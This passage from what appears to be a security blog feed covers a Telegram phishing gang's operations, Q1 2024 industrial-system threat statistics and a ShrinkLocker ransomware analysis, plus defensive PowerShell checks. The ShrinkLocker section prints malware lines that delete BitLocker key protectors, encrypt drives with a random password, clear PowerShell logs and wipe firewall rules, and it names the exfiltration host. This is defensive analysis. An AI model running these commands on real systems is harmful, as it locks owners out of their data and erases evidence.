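        $verdict = 'low'
        $reason  = "look-alike of $imitates without the bot path pattern"
    }

    [pscustomobject]@{
        Url     = $Url
        Host    = $hostName
        Action  = $(if ($pathMatches) { $segments[1] } else { $null })
        AdId    = $(if ($pathMatches) { $segments[2] } else { $null })
        Verdict = $verdict
        Reason  = $reason
    }
}

# Constructed sample input; none of these hosts is an indicator from the article.
$samples = @(
    'https://tutti-ch.example/de/pay/4471230',    # look-alike host + bot pattern -> high
    'https://www.tutti.ch/de/pay/4471230',        # real board domain -> clean
    'https://delivery.example/fr/receive/98765',  # bot pattern, neutral domain -> medium
    'https://anibis-ch.example/about'             # look-alike host, ordinary path -> low
)
$samples | ForEach-Object { Test-BoardPhishingLink -Url $_ } | Format-Table -AutoSize
```

The host check only catches domains that contain a board's name; a domain differing from the original by a single letter, which the article also describes, needs an additional edit-distance comparison.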

Bot updates

Cybergangs are constantly tweaking and updating their Telegram bots. They add new information useful for workers and expand the arsenal of scam automation tools.

During our observation of the Telegram bot under study, information appeared about the group’s income for different periods: per day and for its entire existence, as well as information about the worker’s income per week and per month.

User profile information

The next update added detailed information about mentors and their workload. In total, the group has five mentors, who oversee more than 300 workers. At the time of posting, the scammers’ group on Telegram had more than 10,000 members.

The most experienced workers with profits in excess of 20,000 euros can become mentors. This involves submitting an application to the head mentor for consideration. Mentors receive a percentage of their mentees’ earnings. The size of the commission is set by mentors themselves, and goes up with experience.

Mentoring system

Besides the modified interface, the way in which links are created was updated, with an expanded list of platforms targeted by phishing.

Platforms for phishing

What happens after clicking a link

The link from the bot points to a phishing site, the address of which may differ from the original by just one letter. The page is a full copy of the original ad, including the site logo and name, price and description of the item of interest.

Phishing ad aimed at deceiving the buyer. For the seller, the page is the same, only instead of a Pay button there will be a Receive button.

When the victim clicks the phishing link, the worker receives a notification in the bot about this activity. The notification prompts the scammer to check if the victim is online (that is, whether they’ve opened the phishing link) and, if necessary, to start a chat. Such notifications are created to simplify the worker’s tasks and speed up the response.

Notification about a phishing link click

When the victim enters card details, the carder immediately uses them, and a notification is sent to the group’s general chat about receipt of a new payment. The message specifies the stolen amount, plus information about how much of it will go to the carder and the worker. The worker’s share is automatically credited to their account specified in the bot settings. The message from the bot also contains the name of the user who pays the worker their profit. This is so that scammers themselves do not get cheated, as there have been cases of workers, under the guise of payment, swindling money out of “colleagues” or asking to borrow a certain sum and not returning it.

Notification of payment

Late in the day, a notification is sent to the general chat about the amount earned by the entire group for the day, month and whole period of operation. The group in question was established in August 2023. It made its first profit 3 days and 17 hours later. Back then, it had 2,675 workers and receipts worth 1,458 USD.

Amount of group payments for February 2024

Profit and statistics

We compiled statistics on the group’s activities for the period February 1–4, 2024, inclusive.

Country       Total logs        Total profits
Canada        1,084.999 CAD     0 CAD
Switzerland   50,431.17 CHF     10,273 CHF
France        850 EUR           0 EUR
Austria       2,900 EUR         0 EUR

In four days, the group earned 10,273 CHF (roughly 11,500 USD). At the same time, from the log amounts, we see the attackers could have stolen over 50,000 USD from Swiss cards alone. Why didn’t they? The main reason is that the carder does not work with logs worth less than 300 CHF (330 USD). This is most likely because total profits received from such logs will be less than the cost of debiting them. Moreover, withdrawing money from a card carries a high risk of detection, so carders are only interested in cards holding large sums of money. Lastly, some victims may have managed to block their cards before they fell into the carder’s hands, or entered incorrect data, which would have impacted the total amount of logs.

Carder limit

Country       Number of logs
Switzerland   65
France        6
Austria       4
Canada        4

Looking at the number of logs received, we see the most popular country is Switzerland. France comes second. In joint third place are Austria and Canada.

Platform      Number of logs    Total profits
Facebook      26                0 CHF
Post.ch       16                3,887 CHF
Tutti.ch      16                2,434 CHF
Anibis.ch     11                3,952 CHF

In terms of message boards whose users were scammed, the most popular platforms among attackers were: Facebook, Post.ch and Tutti.ch. That said, logs from Facebook earned no profits for scammers. The most profitable platform was Anibis.ch, which lies in fourth place by number of logs; Post.ch is in second place, and Tutti.ch in third.

How not to swallow workers’ bait

Although message board scams are automated and production-lined, you can take protective measures.

  • Trust only official sites. Before entering card details in any form, study the site address, make sure there are no typos or extra characters in the domain, and check when it was created: if the site is just a couple of months old, it is likely to be fraudulent. Safest of all is not to follow links to enter your data, but to type in the URL in the address bar manually or open it from bookmarks.
  • When buying or selling goods on message boards, do not switch to third-party messengers. Conduct all correspondence in a chat on the platform. Such platforms typically use fraud protection and forbid sending suspicious links.
  • Where possible, refuse payment in advance – pay only when you receive the item in good condition.
  • Do not scan QR codes sent from untrusted sources.
  • Do not sell goods “with delivery” if the platform has no such option. If the buyer is located in another city, choose a delivery service yourself, giving preference to large, reputable companies.

Threat landscape for industrial automation systems, Q1 2024

27 May, 2024 - 12:00

Global statistics

Statistics across all threats

In the first quarter of 2024, the percentage of ICS computers on which malicious objects were blocked decreased by 0.3 pp from the previous quarter to 24.4%.

Compared to the first quarter of 2023, the percentage decreased by 1.3 pp.

Percentage of ICS computers on which malicious objects were blocked, by quarter, 2022–2024

Selected industries

Building automation has historically led the surveyed industries in terms of the percentage of ICS computers on which malicious objects were blocked.

Percentage of ICS computers on which malicious objects were blocked in selected industries

In the first quarter of 2024, the percentage of ICS machines that blocked malicious objects decreased across all industries.

Diversity of detected malware

In the first quarter of 2024, Kaspersky’s protection solutions blocked malware from 10,865 different families belonging to various categories on industrial automation systems.

Percentage of ICS computers on which the activity of malicious objects in various categories was prevented

Compared to the previous quarter, in the first quarter of 2024, the most significant increase in the percentage of ICS computers on which malicious objects in various categories were blocked was detected for AutoCAD malware: by 1.16 times.

Main threat sources

The internet, email clients, and removable storage devices remain the primary sources of threats to computers in an organization’s operating technology infrastructure. Note that the sources of blocked threats cannot be reliably identified in all cases.

In the first quarter of 2024, the percentage of ICS computers on which threats from various sources were blocked decreased for every major source.

Percentage of ICS computers on which malicious objects from various sources were blocked


Regionally, the percentage of ICS computers that blocked malicious objects during the quarter ranged from 32.4% in Africa to 11.5% in Northern Europe.

Regions ranked by percentage of ICS computers where malicious objects were blocked, Q1 2024

The two regions with the highest percentage of attacked ICS computers, Africa and South-East Asia, saw their percentages increase from the previous quarter.

Malicious activity in numbers

Malicious objects used for initial infection

Malicious objects that are used for initial infection of computers include dangerous internet resources that are added to denylists, malicious scripts and phishing pages, and malicious documents.

By cybercriminals’ logic, these malicious objects can spread easily. As a result, they are blocked by security solutions more often than everything else. This is also reflected in our statistics.

Globally and in almost all regions, denylisted internet resources and malicious scripts and phishing pages occupy first place in the rankings of malware categories by percentage of ICS computers on which this malware is blocked.

The sources of most malicious objects used for initial infection are the internet and email. The leading regions by percentage of ICS computers on which threats from these sources were blocked are the following:

Internet threats

  • Africa – 14.82%;
  • South-East Asia – 14.01%.

Email threats

  • Southern Europe – 6.85%;
  • Latin America – 5.09%.
Denylisted internet resources

The leading regions by percentage of ICS computers on which denylisted internet resources were blocked were:

  • Africa – 8.78%;
  • Russia – 7.49%;
  • South Asia – 7.48%.

Malicious scripts and phishing pages

The leading regions by percentage of ICS computers on which malicious scripts and phishing pages were blocked were:

  • Latin America – 7.23%;
  • Southern Europe – 6.96%;
  • Middle East – 6.95%.

Malicious documents

The leading regions by percentage of ICS computers on which malicious documents were blocked were:

  • Southern Europe – 3.24%;
  • Latin America – 2.94%;
  • Eastern Europe – 2.33%.

Next-stage malware

Malicious objects used for initial infection of computers deliver next-stage malware – spyware, ransomware, and miners – to victims’ computers.

Among the miners designed to run on Windows, some of the most common are those distributed by attackers in the form of NSIS installer files with legitimate software.


As a rule, the higher the percentage of ICS computers on which initial infection malware is blocked, the higher the percentage of next-stage malware.

The three leading regions by percentage of ICS computers on which spyware was blocked were as follows:

  • Africa – 6.65%;
  • Middle East – 5.89%;
  • Southern Europe – 5.45%.

Spyware ranks no higher than third place in the threat category rankings by percentage of ICS computers on which it was blocked in almost every region except for:

  • East Asia: in this region, spyware is the number one malware category in terms of the percentage of ICS computers on which it was blocked, at 3.68%.
  • Central Asia: in this region, in the relevant rankings, spyware sits at second place with 4.40%.

Covert crypto mining programs

Miners in the form of executable files for Windows

The leading regions by percentage of ICS computers on which miners in the form of executable files for Windows were blocked were:

  • Central Asia – 1.78%;
  • Russia – 1.38%;
  • Eastern Europe – 1.06%.

Miners in the form of Windows executable files are seventh in the global rankings of threat categories by percentage of ICS computers on which they were blocked.

  • They are fourth in the relevant rankings for Russia.
  • They are in fifth place in Central Asia.

We should note that during Q1 2024, the percentage of ICS computers on which miners in the form of Windows executable files were blocked increased in all regions except for Russia and Central Asia.

Web miners running in browsers

The leading regions by percentage of ICS computers on which browser-based web miners were blocked were:

  • Africa – 0.91%;
  • Middle East – 0.84%;
  • Australia and New Zealand – 0.78%.

In the regional rankings of threat categories by percentage of ICS computers on which they were blocked, web miners ended up in fifth place in the following regions:

  • Australia and New Zealand – 0.78%;
  • US and Canada – 0.45%;
  • Northern Europe – 0.27%.

Globally, this threat ranked eighth.

In Q1 2024, the percentage of ICS computers on which browser-based web miners were blocked increased in all regions except for Russia and Central Asia.


The regions with the highest percentage of ICS computers on which ransomware was blocked were:

  • Middle East – 0.28%;
  • Africa – 0.27%;
  • South Asia – 0.22%.

Self-propagating malware. Worms and viruses

Worms and virus-infected files were originally used for initial infection, but as botnet functionality evolved, they took on next-stage characteristics.

To spread across ICS networks, viruses and worms rely on removable media, network folders, infected files including backups, and network attacks on outdated software.

In three regions, the percentage of ICS computers on which threats were blocked when connecting removable media is higher than the percentage of ICS computers on which mail threats were blocked – although it was lower in all others:

  • Africa – 5.6% (leads this ranking);
  • South Asia – 2.46%;
  • Central Asia – 1.51%.

The leading regions by percentage of ICS computers on which worms were blocked were:

  • Africa – 5.29%;
  • Central Asia – 2.88%;
  • Middle East – 2.40%.

Globally, worms are in sixth place in the threat category ranking by percentage of ICS computers on which they were blocked. In similar regional rankings, worms are in fourth place in four regions:

  • Africa – 5.29%;
  • Central Asia – 2.88%;
  • Middle East – 2.40%;
  • South Asia – 1.95%.

Two of these regions led by percentage of ICS computers on which threats were blocked when connecting removable media:

  • Africa – 5.60%;
  • South Asia – 2.46%.

The leading regions by percentage of ICS computers on which viruses were blocked were:

  • Southeast Asia – 7.61%;
  • Africa – 4.09%;
  • East Asia – 2.89%.

In Southeast Asia, viruses are in first place (!) in the threat category rankings by percentage of ICS computers on which they were blocked.

Note that two of the three top regions are also leaders by percentage of ICS computers on which network folder threats were blocked.

  • Southeast Asia – 0.43%;
  • East Asia – 0.32%.

AutoCAD malware

AutoCAD malware can spread in a variety of ways, so it falls into a separate category.

The same regions that lead in the virus rankings are also the leaders by percentage of ICS computers on which AutoCAD malware was blocked:

  • Southeast Asia – 2.81%;
  • East Asia – 1.49%;
  • Africa – 0.61%.

Normally, AutoCAD malware is a minor threat that usually comes last in the malware category rankings by percentage of ICS computers on which it is blocked. In Southeast Asia in Q1 2024, this category was fifth.

The full global and regional reports have been published on the Kaspersky ICS CERT website.

ShrinkLocker: Turning BitLocker into ransomware

23 May, 2024 - 14:00


Attackers always find creative ways to bypass defensive features and accomplish their goals. This can be done with packers, crypters, and code obfuscation. However, one of the best ways of evading detection, as well as maximizing compatibility, is to use the operating system’s own features. In the context of ransomware threats, one notable example is leveraging exported functions present in the cryptography DLL ADVAPI32.dll, such as CryptAcquireContextA, CryptEncrypt, and CryptDecrypt. In this way, the adversaries can make sure that the malware can run and simulate normal behavior in various versions of the OS that support this DLL.

Although this seems smart enough, another clever technique caught our attention in a recent incident response engagement: using the native BitLocker feature to encrypt entire volumes and stealing the decryption key. The original purpose of BitLocker is to address the risks of data theft or exposure from lost, stolen, or improperly decommissioned devices. Nonetheless, threat actors have found out that this mechanism can be repurposed for malicious ends to great effect.

In that incident, the attackers were able to deploy and run an advanced VBS script that took advantage of BitLocker for unauthorized file encryption. We spotted this script and its modified versions in Mexico, Indonesia, and Jordan. In the sections below, we analyze in detail the malicious code obtained during our incident response effort and provide tips for mitigating this kind of threat.

This is not the first time we have seen BitLocker used for encrypting drives and demanding a ransom. Previously, attackers used this Microsoft utility to encrypt critical systems after accessing and controlling these. In this case, however, the adversary took additional steps to maximize the damage from the attack and hinder an effective response to the incident.

VBScript analysis

One interesting fact is that the attackers did not bother to obfuscate the bulk of the code, as threat actors typically do. The most plausible explanation for this is that they already had full control of the target system when the script was executed. It is stored at C:\ProgramData\Microsoft\Windows\Templates\ as Disk.vbs. Its first lines contain a function that converts a string to its binary representation using an ADODB.Stream object. This function is later used for encoding data to be sent in an HTTP POST request.

Stream_StringToBinary function

The first step by the main function of the script is to use Windows Management Instrumentation (WMI) to query information about the operating system with the help of the Win32_OperatingSystem class. For each object within the query results, the script checks if the current domain is different from the target. If it is, the script finishes automatically. After that, it checks if the name of the operating system contains “xp”, “2000”, “2003”, or “vista”, and if the Windows version matches any one of these, the script finishes automatically and deletes itself.

Initial conditions for execution

After that, the script continues to rely on WMI for querying information about the OS. It then performs disk resizing operations, which may vary with the result of the OS version check. These operations are performed solely on fixed drives (DriveType = 3). The following drive types typically exist in a file system:

$DriveType_map = @{
    0 = 'Unknown'
    1 = 'No Root Directory'
    2 = 'Removable Disk'
    3 = 'Local Disk'        # This is the DriveType searched by the malware.
    4 = 'Network Drive'
    5 = 'Compact Disc'
    6 = 'RAM Disk'
}

The likely reason the malware does not try to perform the same operations on network drives (DriveType = 4) is to avoid triggering detection tools on the network.

To resize local drives in Windows Server 2008 or 2012, the script checks the primary boot partition and saves this information. It saves the index of the different partitions and then performs the following actions using diskpart:

  • Shrink the size of each non-boot partition by 100 MB. This creates 100 MB in unallocated space in each partition other than the boot volume;
  • Split the unallocated space into new 100 MB primary partitions;
  • Format the partitions with the override option, which forces the volume to dismount first if necessary, and assigns a file system and a drive letter to each;
  • Activate the partitions;
  • If the shrink procedure was successful, save “ok” as a variable, so the script can continue.

Disk resizing operations performed by the script in Windows Server 2008 and 2012

If the operation is successful, the code uses the utility bcdboot and the drive letter saved previously as a boot volume to reinstall the boot files on the new primary partitions.

Boot files reinstall

The partition shrink operations for other OS versions are similar but implemented with a different piece of code for compatibility reasons. The example below shows the process as applied to the Windows versions 7, 8, and 8.1.

Disk resizing operations in the Windows versions 7, 8, or 8.1

For Windows 2008 or 7, after the partition shrink procedure finishes, the variable matchedDrives saves the drive letters separated by commas, but only if the file system is NTFS, exFAT, FAT32, ReFS, or FAT. The code was modified to print an example:

matchedDrives variable data

The script then adds the following registry entries:

  • fDenyTSConnections = 1: disables RDP connections;
  • scforceoption = 1: enforces smart card authentication;
  • UseAdvancedStartup = 1: requires the use of the BitLocker PIN for pre-boot authentication;
  • EnableBDEWithNoTPM = 1: allows BitLocker without a compatible TPM chip;
  • UseTPM = 2: allows the use of TPM if available;
  • UseTPMPIN = 2: allows the use of a startup PIN with TPM if available;
  • UseTPMKey = 2: allows the use of a startup key with TPM if available;
  • UseTPMKeyPIN = 2: allows the use of a startup key and PIN with TPM if available;
  • EnableNonTPM = 1: allows BitLocker without a compatible TPM chip, requires a password or startup key on a USB flash drive;
  • UsePartialEncryptionKey = 2: requires the use of a startup key with TPM;
  • UsePIN = 2: requires the use of a startup PIN with TPM.

If the script detects an error, it restarts the system.

Registry modifications

By analyzing the malware dynamically, we can confirm the registry changes performed:

HKLM\SOFTWARE\Policies\Microsoft\FVE\UseTPMPIN: 0x00000002
HKLM\SOFTWARE\Policies\Microsoft\FVE\UseTPMKey: 0x00000002
HKLM\SOFTWARE\Policies\Microsoft\FVE\UseTPMKeyPIN: 0x00000002
HKLM\SOFTWARE\Policies\Microsoft\FVE\EnableNonTPM: 0x00000001
HKLM\SOFTWARE\Policies\Microsoft\FVE\UsePartialEncryptionKey: 0x00000002
HKLM\SOFTWARE\Policies\Microsoft\FVE\UsePIN: 0x00000002
HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UseAdvancedStartup: 0x00000001
HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\EnableBDEWithNoTPM: 0x00000001
HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UseTPM: 0x00000002
HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UseTPMPIN: 0x00000002
HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UseTPMKey: 0x00000002
HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UseTPMKeyPIN: 0x00000002
HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\EnableNonTPM: 0x00000001
HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UsePartialEncryptionKey: 0x00000002
HKLM\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE\UsePIN: 0x00000002

Interestingly enough, there are several functions performing these operations, each designed for a different version of Windows. In some conditionals, it checks if BitLocker Drive Encryption Tools are active through the ID 266 of Remote Server Administration Tools. The malware then checks if the BitLocker Drive Encryption Service (BDESVC) is running. If not, it starts the service.
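The registry values, service and file names above, together with the scheduled tasks and log clearing described later, give a defender a concrete set of host traces to check for. The following is an added example, not code from the Securelist analysis: a read-only audit that reports those traces on a single host. Value names, the BDESVC service, the Disk.vbs path and the task names come from the article; the registry locations of fDenyTSConnections and scforceoption are their standard Windows paths, which the article does not spell out, and the function name and the five-of-nine threshold are this example's own choices.

```powershell
# Added example: read-only host audit for the traces described in the article.
# Policy value names and values are those the script writes (from the article);
# the threshold of 5 matching values and the function name are assumptions.
$FvePolicyValues = @{
    UseAdvancedStartup      = 1
    EnableBDEWithNoTPM      = 1
    UseTPM                  = 2
    UseTPMPIN               = 2
    UseTPMKey               = 2
    UseTPMKeyPIN            = 2
    EnableNonTPM            = 1
    UsePartialEncryptionKey = 2
    UsePIN                  = 2
}
$FvePolicyPaths = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\FVE',
    'HKLM:\SOFTWARE\WOW6432Node\Policies\Microsoft\FVE'
)

function Get-ShrinkLockerIndicators {
    [CmdletBinding()]
    param()
    $findings = New-Object System.Collections.Generic.List[string]

    # 1. FVE policy values set to the combination the script writes (TPM optional,
    #    PIN or startup key required). Report a path when most of the nine match.
    foreach ($path in $FvePolicyPaths) {
        if (-not (Test-Path $path)) { continue }
        $props = Get-ItemProperty -Path $path
        $hits  = @($FvePolicyValues.Keys | Where-Object { $props.$_ -eq $FvePolicyValues[$_] })
        if ($hits.Count -ge 5) {
            $findings.Add("$path has $($hits.Count)/9 policy values matching the script: $($hits -join ', ')")
        }
    }

    # 2. RDP denied and smart card logon forced (standard policy locations, assumed)
    $ts  = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -ErrorAction SilentlyContinue
    $sys = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -ErrorAction SilentlyContinue
    if ($ts.fDenyTSConnections -eq 1) { $findings.Add('fDenyTSConnections=1: RDP connections denied') }
    if ($sys.scforceoption -eq 1)     { $findings.Add('scforceoption=1: smart card logon enforced') }

    # 3. Dropped script and the scheduled tasks the script removes during cleanup
    $scriptPath = 'C:\ProgramData\Microsoft\Windows\Templates\Disk.vbs'
    if (Test-Path $scriptPath) { $findings.Add("script present: $scriptPath") }
    foreach ($task in 'VolumeInit', 'VolumeCheck') {
        if (Get-ScheduledTask -TaskName $task -ErrorAction SilentlyContinue) {
            $findings.Add("scheduled task present: $task")
        }
    }

    # 4. BDESVC running on a host where BitLocker is not expected to be in use
    $svc = Get-Service -Name BDESVC -ErrorAction SilentlyContinue
    if ($svc -and $svc.Status -eq 'Running') { $findings.Add('BDESVC is running') }

    # 5. Volume labels that contain an e-mail address (the script relabels partitions)
    Get-Volume -ErrorAction SilentlyContinue | Where-Object { $_.FileSystemLabel -match '@' } |
        ForEach-Object { $findings.Add("volume $($_.DriveLetter) labelled '$($_.FileSystemLabel)'") }

    # 6. Encrypted volumes with no recovery password protector left to escrow
    #    (the script deletes the default protectors before enabling encryption)
    if (Get-Command Get-BitLockerVolume -ErrorAction SilentlyContinue) {
        foreach ($vol in Get-BitLockerVolume) {
            $types = @($vol.KeyProtector | ForEach-Object { $_.KeyProtectorType })
            if ($vol.VolumeStatus -ne 'FullyDecrypted' -and 'RecoveryPassword' -notin $types) {
                $findings.Add("volume $($vol.MountPoint) encrypted without a recovery password protector (protectors: $($types -join ', '))")
            }
        }
    }

    # 7. Clearing a log with wevtutil leaves event ID 104 in the System log
    $cleared = Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 104 } -MaxEvents 20 -ErrorAction SilentlyContinue
    foreach ($e in $cleared) {
        $findings.Add("log cleared at $($e.TimeCreated): $($e.Message -split "`n" | Select-Object -First 1)")
    }

    return $findings
}

Get-ShrinkLockerIndicators | ForEach-Object { Write-Output "[!] $_" }
```

Run it elevated so the policy keys and BitLocker state are readable; an empty result means none of the listed traces is present, not that the host is clean.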

BDESVC verification

The script also changes the label of the new boot partitions to the attacker’s email as shown in the images below, so the victim can contact them.

Drive label modification

Attacker’s email as a drive label

After that, the malware disables the protectors used to secure BitLocker’s encryption key and deletes them. The deletion method may vary depending on the version of the OS. In a Windows Server 2008 or Windows 7 scenario, this is accomplished via VBS features, after which the script uses PowerShell to force the deletion of the protectors.

Having completed the deletion, it enables the use of a numerical password as a protector and the encryption feature.

Protectors deletion

The reason for deleting the default protectors is to avoid the recovery of the keys by the user, as in the example below.

The recovery of BitLocker keys

As the next step, the 64-character encryption key is generated by the malware using a random multiplication and replacement of the following elements:

  • A variable with the numbers 0–9;
  • The famous pangram, “The quick brown fox jumps over the lazy dog”, in lowercase and uppercase, which contains every letter of the English alphabet;
  • Special characters.

The randomness of this password is accomplished by a seed made of various elements of the affected system, such as used memory and network statistics. Later, this information is sent to the attacker. We tested the key generation logic in our environment, and with a slight modification of the script, we were able to see the generated password.

Key generation process

The code then converts the previously generated encryption key to a secure string—a PowerShell option that prevents creating a string object in memory—and effectively enables BitLocker on the drives.

If Len((CreateObject("WScript.Shell").Exec("powershell.exe -Command ""$protectors = (Get-BitLockerVolume -MountPoint " & drives(i) & ").KeyProtector; if ($protectors -ne $null) { foreach ($protector in $protectors) { Remove-BitLockerKeyProtector -MountPoint " & drives(i) & " -KeyProtectorId $protector.KeyProtectorId } }""")).stdout.readall) > 0 Then: End If
If Len((CreateObject("WScript.Shell").Exec("powershell.exe -Command $a=ConvertTo-SecureString " & Chr(34) & Chr(39) & strRandom & Chr(39) & Chr(34) & " -asplaintext -force;Enable-BitLocker " & drives(i) & " -s -qe -pwp -pw $a")).stdout.readall) > 0 Then: End If
If Len((CreateObject("WScript.Shell").Exec("powershell.exe -Command Resume-BitLocker -MountPoint " & drives(i) & " ")).stdout.readall) > 0 Then: End If

The script then creates an HTTP POST request object using the following options:

  • Use WinHTTP version 5.1.
  • Accept the French language.
  • Ignore SSL errors (httpRequest.Option(4) = 13056, i.e. WinHttpRequestOption_SslErrorIgnoreFlags).
  • Disable redirects (httpRequest.Option(6) = false, i.e. WinHttpRequestOption_EnableRedirects).

The attackers used the domain trycloudflare.com to obfuscate their real address. This domain is legitimate: it belongs to Cloudflare and is used to provide quick tunnels for developers. The subdomain configured by the attackers was scottish-agreement-laundry-further.

Request creation

The malware also includes information about the machine and the generated password as a payload for the POST request, as shown in the image below.

Information to be sent in the POST request

The script also contains a loop that tries to send the information to the attacker five times if an error occurs.

Retry procedure

With some tweaks, we were able to print the data being sent to the attacker, as shown in the image below. Note that the data includes the computer name, Windows version, drives affected, and the password string. Consequently, the victim’s IP address will also be logged on the attacker’s server, allowing them to track each victim.

Information to be sent

After removing the BitLocker protectors and configuring drive encryption, the script goes through the following steps to cover its tracks.

It validates if the hostname is the target of this malware, then deletes the files:

  • \Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml
  • \scripts\Login.vbs
  • \scripts\Disk.vbs
  • C:\ProgramData\Microsoft\Windows\Templates\Disk.vbs

Delete operations

The script then clears the Windows PowerShell and Microsoft-Windows-PowerShell/Operational logs with wevtutil. It turns on the system firewall and deletes all of its rules. It also deletes the tasks VolumeInit and VolumeCheck. Finally, the malware performs a forced shutdown.

If Len((CreateObject("WScript.Shell").Exec("wevtutil cl ""Windows PowerShell""")).stdout.readall) > 0 Then: End If
If Len((CreateObject("WScript.Shell").Exec("wevtutil cl ""Microsoft-Windows-PowerShell/Operational""")).stdout.readall) > 0 Then: End If
If Len((CreateObject("WScript.Shell").Exec("netsh advfirewall set allprofiles state on")).stdout.readall) > 0 Then: End If
If Len((CreateObject("WScript.Shell").Exec("netsh advfirewall firewall delet rule name=all")).stdout.readall) > 0 Then: End If
If Len((CreateObject("WScript.Shell").Exec("schtasks /Delete /TN ""VolumeInit"" /F")).stdout.readall) > 0 Then: End If
If Len((CreateObject("WScript.Shell").Exec("schtasks /Delete /TN ""VolumeCheck"" /F")).stdout.readall) > 0 Then: End If

After the shutdown, the victim will see the BitLocker screen. If the user tries to use the recovery options, they will see nothing but the message, “There are no more BitLocker recovery options on your PC”.

BitLocker recovery screen

Tactics, techniques and procedures

The analysis showed that this threat actor has an extensive understanding of the VBScript language, and Windows internals and utilities, such as WMI, diskpart, and bcdboot. Below are the TTPs identified for this scenario.

Tactic            Technique                                          ID
Execution         Command and Scripting Interpreter: Visual Basic    T1059.005
Execution         Windows Management Instrumentation                 T1047
Execution         Command and Scripting Interpreter: PowerShell      T1059.001
Impact            Data Encrypted for Impact                          T1486
Impact            System Shutdown/Reboot                             T1529
Defense evasion   Clear Windows Event Logs                           T1070.001
Defense evasion   Modify Registry                                    T1112
Defense evasion   Disable or Modify System Firewall                  T1562.004
Exfiltration      Exfiltration Over Web Service                      T1041

Artifacts and digital forensics

As the local activity performed by the script includes cleaning up its traces, clearing some logs and the tasks created for execution, and finally, encrypting the whole drive, it was not easy to get forensic artifacts to identify the malicious activities and to find opportunities for decryption.

Fortunately, some of the script content and commands executed were registered and logged by a third-party service, and these were collected for analysis. This allowed us to obtain the secure strings to which the encryption keys were converted from some of the affected systems.

Secure strings obtained

Elsewhere, we attempted to collect network logs where the POST requests to the C2 were stored. However, the most common configuration for web activity logging includes GET but unfortunately not POST requests.

We did finally obtain the POST requests, but this was very challenging. The case provides justification for logging POST traffic and ensuring that all critical system activity is forwarded to a central repository with enough space for storing data for the recommended retention period (six or more months) to avoid losing evidence after attackers remove all their traces from the individual systems.

Finally, some systems in the customer’s infrastructure remained unencrypted and were considered unaffected at first. However, we later found out that they had, in fact, been affected, but BitLocker was not configured in these systems. This made it possible for us to obtain the script itself, analyze its behavior and collect further evidence.


While we could obtain some of the passphrases and fixed values the threat actor used to create the encryption keys, the script also includes variable values that differ for each affected system, which makes decryption difficult.

Network information collected for use in the seed


Companies are encouraged to use BitLocker or other encryption tools (such as VeraCrypt) to protect corporate secrets. However, a few precautions must be taken to avoid abuse by attackers.

  • Use a robust, properly configured EPP solution to detect threats that try to abuse BitLocker;
  • Implement Managed Detection and Response (MDR) to proactively scan for threats;
  • If BitLocker is enabled, make sure you are using a strong password and have the recovery keys stored in a secure location;
  • Ensure that users have only minimal privileges. This way, they cannot enable encryption features or change registry keys on their own;
  • Enable network traffic logging and monitoring. Configure the logging of both GET and POST requests. In case of infection, the requests made to the attacker’s domain may contain passwords or keys;
  • Monitor for events associated with VBS execution and PowerShell, and save the logged scripts and commands to an external repository storing activity that may be deleted locally;
  • Make backups frequently, store them offline, and test them.
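The following script is an added example, not code from the Securelist article or from Kaspersky, that turns three of the recommendations above (recovery keys present and ready to escrow, PowerShell script logging switched on, BitLocker activity visible in the event log) into a read-only posture check. It assumes the BitLocker PowerShell module is available (Windows 10/11, or Windows Server with the BitLocker feature installed) and that it runs with administrator rights; the function names are my own.

```powershell
# Added example (not from the article): read-only BitLocker and logging posture check.
# Assumes the BitLocker module (Get-BitLockerVolume) and administrator rights.

function Get-BitLockerPosture {
    # One row per mount point: protection state, which key protectors exist, and whether
    # a recovery password protector exists at all (you cannot escrow what was never created).
    Get-BitLockerVolume | ForEach-Object {
        $protectorTypes = @($_.KeyProtector | ForEach-Object { $_.KeyProtectorType })
        [pscustomobject]@{
            MountPoint          = $_.MountPoint
            VolumeStatus        = $_.VolumeStatus
            ProtectionStatus    = $_.ProtectionStatus
            KeyProtectors       = ($protectorTypes -join ',')
            HasRecoveryPassword = ($protectorTypes -contains 'RecoveryPassword')
        }
    }
}

function Test-ScriptBlockLoggingEnabled {
    # Script block logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational) keeps a
    # copy of scripts that an attacker later deletes from disk, which is what the article
    # relied on a third-party service for.
    $key   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    $value = (Get-ItemProperty -Path $key -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue).EnableScriptBlockLogging
    return ($value -eq 1)
}

function Get-RecentBitLockerEvents {
    param([int]$Hours = 24)
    # The BitLocker management log records protector changes and encryption start/stop.
    # A burst of such events outside a planned rollout deserves a look.
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-BitLocker/BitLocker Management'
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, Message
}

$posture = Get-BitLockerPosture
$posture | Format-Table -AutoSize

# Volumes that are encrypted (or encrypting) but have no recovery password to escrow.
$posture |
    Where-Object { $_.VolumeStatus -ne 'FullyDecrypted' -and -not $_.HasRecoveryPassword } |
    ForEach-Object { Write-Warning "No recovery password protector on $($_.MountPoint)" }

if (-not (Test-ScriptBlockLoggingEnabled)) {
    Write-Warning 'PowerShell script block logging is not enabled by policy'
}

Get-RecentBitLockerEvents -Hours 24 | Format-Table -AutoSize
```

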